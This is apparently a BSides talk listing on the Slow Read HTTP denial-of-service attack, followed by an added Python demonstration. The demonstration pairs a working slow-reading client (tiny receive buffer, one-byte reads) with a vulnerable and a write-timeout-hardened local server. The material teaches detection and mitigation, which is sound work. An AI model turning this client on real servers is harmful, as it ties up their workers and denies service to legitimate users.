Yet Another Type of Application Layer DoS Attack that Should Be Taken Care Of

While developers and administrators now pay attention to handling slow HTTP requests without trouble, another side of the connection is overlooked: making sure that the clients of an HTTP server accept the server's data fast enough.

This workshop presents a tool that, among other attacks, performs a Slow Read application layer DoS attack: it keeps the HTTP server busy by requesting relatively large resources and accepting them abnormally slowly, exploiting the TCP persist timer (MS09-048, CVE-2008-4609, CVE-2009-1925, CVE-2009-1926). Although the possibility of prolonging a TCP connection indefinitely was first described three years ago, most web servers still cannot handle it. My approach, unlike others, requires no TCP packet crafting: the tool I developed controls TCP bandwidth by manipulating socket options through the socket API.

The attack is easy to execute because a single machine can establish thousands of connections to a server and issue thousands of legitimate HTTP requests in a very short time using minimal bandwidth. Because HTTP server implementations differ, several attack vectors exist; the talk discusses them, demonstrates the attack, and covers the best approaches for detecting whether a server is vulnerable to it, along with detection and mitigation techniques.
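To make the mechanism concrete, here is an added example (written for this page, not code from the talk or from the presenter's tool) of a Slow Read client that uses nothing but the socket API, run against a constructed in-process HTTP server in two variants: one that waits indefinitely for the client to drain the response, and one that enforces a response write timeout, the same idea as the nginx "send_timeout" directive or the Apache "Timeout" directive. The loopback address, kernel-chosen port, 32 MiB body, timeouts and the STATE bookkeeping are all assumptions made for the example.

```python
"""Added example (not code from the talk or from the presenter's tool):
a Slow Read client built only from socket options and tiny recv() calls,
run against an in-process HTTP server in two variants, one with no
response write timeout and one that evicts readers who do not drain the
response in time. Address, port, body and timeouts are constructed."""
import http.server
import socket
import threading
import time

BODY = b"X" * (32 * 1024 * 1024)   # constructed 32 MiB resource, larger than any sane socket buffer
STATE = {}                          # outcome of each server's response write, keyed by port


class VulnerableHandler(http.server.BaseHTTPRequestHandler):
    """Serves BODY and waits forever for the client to drain it (the usual default)."""
    send_timeout = None             # seconds the client gets to drain the response; None = unbounded

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Length", str(len(BODY)))
        self.end_headers()
        port = self.server.server_port
        if self.send_timeout is not None:
            # Bound how long a blocked write may wait for the peer's window to open,
            # the same idea as nginx "send_timeout" or Apache "Timeout" (assumed analogy).
            self.connection.settimeout(self.send_timeout)
        STATE[port] = "writing"
        try:
            self.wfile.write(BODY)  # blocks once the client's window and our send buffer are full
            STATE[port] = "completed"
        except socket.timeout:
            STATE[port] = "timed_out"     # slow reader evicted, worker thread freed
        except OSError:
            STATE[port] = "aborted"       # client went away (reset) mid-response
        self.close_connection = True

    def log_message(self, *args):
        pass                            # keep the demo quiet


class HardenedHandler(VulnerableHandler):
    """Same server, but a reader that stalls the write for 1 s is dropped."""
    send_timeout = 1.0


def start_server(handler_cls):
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler_cls)  # port 0: kernel picks one
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def slow_read(port, rcvbuf=1024, chunk=1, interval=0.05, hold=2.0):
    """One Slow Read connection: tiny receive buffer plus 1-byte reads.
    SO_RCVBUF is set before connect() so it shapes the window advertised in the
    handshake; the dribbling recv() keeps that window near zero, so the server's
    write stalls behind TCP flow control (zero-window / persist probing) and its
    worker is tied up instead of serving other clients. No packets are crafted.
    Returns (bytes read during `hold` seconds, the still-open socket)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, rcvbuf)
    s.connect(("127.0.0.1", port))
    s.sendall(b"GET /big HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n")  # one perfectly legitimate request
    s.settimeout(hold)
    received = 0
    deadline = time.monotonic() + hold
    try:
        while time.monotonic() < deadline:
            data = s.recv(chunk)
            if not data:            # server closed on us (e.g. its write timeout fired)
                break
            received += len(data)
            time.sleep(interval)    # ~20 bytes/s: the "abnormally slow" reader
    except socket.timeout:
        pass
    return received, s              # caller keeps `s` alive to keep the server stuck


def run_demo(handler_cls, hold=2.0):
    """Attack one server variant; report what the client drained and what the server did."""
    srv = start_server(handler_cls)
    received, sock = slow_read(srv.server_port, hold=hold)
    time.sleep(0.5)                 # let a timed-out handler record its outcome
    return {"received": received,
            "server_state": STATE.get(srv.server_port),
            "_keepalive": (srv, sock)}


if __name__ == "__main__":
    for cls in (VulnerableHandler, HardenedHandler):
        r = run_demo(cls)
        print(f"{cls.__name__}: client drained {r['received']} of {len(BODY)} bytes, "
              f"server handler is {r['server_state']}")
```

Against the unprotected variant the client reads a few dozen bytes in two seconds while the server's write is still blocked; with the write timeout the handler gives up after one second and the worker is free again. Scaling the first case to thousands of connections from one host is the whole attack, and checking whether a server's response write is bounded in time is the first thing to verify when assessing exposure.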
Recorded Feb 28 2012, 60 mins
Presented by Sergey Shekyan
Presentations from the BSides Events and Beyond
  • Title: Yet Another Type of Application Layer DoS Attack that Should Be Taken Care Of
  • Live at: Feb 28 2012 11:00 pm
  • Presented by: Sergey Shekyan